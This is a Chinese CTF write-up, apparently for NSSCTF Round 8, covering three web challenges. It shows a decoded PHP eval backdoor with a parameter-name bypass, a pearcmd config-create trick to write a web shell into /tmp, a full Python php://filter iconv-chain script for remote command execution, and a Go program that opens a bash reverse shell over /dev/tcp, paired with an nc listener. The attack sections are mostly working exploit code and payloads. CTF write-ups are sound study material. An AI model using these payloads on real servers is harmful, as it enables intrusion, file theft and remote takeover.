web

MyDoor

http://43.142.108.3:28348/index.php?file=
这里应该是文件读取,直接、etc/passwd 正常,index.php没有读取到,那伪协议获取源码
PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCg0KaWYgKGlzc2V0KCRfR0VUWydOX1MuUyddKSkgew0KICAgIGV2YWwoJF9HRVRbJ05fUy5TJ10pOw0KfQ0KDQppZighaXNzZXQoJF9HRVRbJ2ZpbGUnXSkpIHsNCiAgICBoZWFkZXIoJ0xvY2F0aW9uOi9pbmRleC5waHA/ZmlsZT0nKTsNCn0gZWxzZSB7DQogICAgJGZpbGUgPSAkX0dFVFsnZmlsZSddOw0KDQogICAgaWYgKCFwcmVnX21hdGNoKCcvXC5cLnxsYXxkYXRhfGlucHV0fGdsb2J8Z2xvYmFsfHZhcnxkaWN0fGdvcGhlcnxmaWxlfGh0dHB8cGhhcnxsb2NhbGhvc3R8XD98XCp8XH58emlwfDd6fGNvbXByZXNzL2lzJywgJGZpbGUpKSB7DQogICAgICAgIGluY2x1ZGUgJGZpbGU7DQogICAgfSBlbHNlIHsNCiAgICAgICAgZGllKCdlcnJvci4nKTsNCiAgICB9DQp9

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
error_reporting(0);

if (isset($_GET['N_S.S'])) {
eval($_GET['N_S.S']);
}

if(!isset($_GET['file'])) {
header('Location:/index.php?file=');
} else {
$file = $_GET['file'];

if (!preg_match('/\.\.|la|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {
include $file;
} else {
die('error.');
}
}

这里可以看到禁用了许多函数,上面是个命令执行,
这里N_S.S 形式第一次见是在ctfshow web123

PHP变量名应该只有数字字母下划线,同时GET或POST方式传进去的变量名,会自动将空格+ . [转换为_
但是有一个特性可以绕过,使变量名出现.之类的
特殊字符[, GET或POST方式传参时,变量名中的[也会被替换为_,但其后的字符就不会被替换了
如 CTF[SHOW.COM=>CTF_SHOW.COM
也就是传参的时候
n_s.s > n[s.s

image-20230216161717020

FLAG 在环境变量里

MyPage 不会

参考
https://blog.csdn.net/qq_61768489/article/details/129016075
http://v2ish1yan.top/2023/02/12/%E6%AF%94%E8%B5%9Bwp/NSSCTF%20Round8/
https://juejin.cn/post/7147638903191814180
首先还是文件包含可以etcpasswd正常,index。php不可以.伪协议php也不可以

pear工具里有一个命令叫:config-create,这个命令需要传入两个参数,其中第二个参数是写入的文件路径,第一个参数会被写入到这个文件中。
我们可以构造url:
index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/+/tmp/shell.php
复制代码
然后包含我们新建的这个文件就OK了。

image-20230216165541573

这里要注意编码问题,要在bp重发包就可以了

http://43.142.108.3:28851/index.php?file=/tmp/shell.php

二 读取源码 flag

http://43.142.108.3:28025//index.php?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/index.php

image-20230216174510836

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import requests

url = "http://43.142.108.3:28025/index.php?file="
file_to_use = "/etc/passwd"
command = "id"

#<?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"

conversions = {
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
}


# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"


for c in base64_payload[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"

filters += "convert.base64-decode"

final_payload = f"php://filter/{filters}/resource={file_to_use}"

r = requests.get(url, params={
"0": command,
"action": "include",
"file": final_payload
})

print(r.text)

Upload_gogoggoUpload_gogoggo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package main

import (
"fmt"
"log"
"os/exec"
)

func main() {
cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
out, err := cmd.CombinedOutput()
if err != nil {
fmt.Printf("combined out:\n%s\n", string(out))
log.Fatalf("cmd.Run() failed with %s\n", err)
}
fmt.Printf("combined out:\n%s\n", string(out))
}

go run run.go

上传这个go文件

nc -lvnkp

image-20230216184449491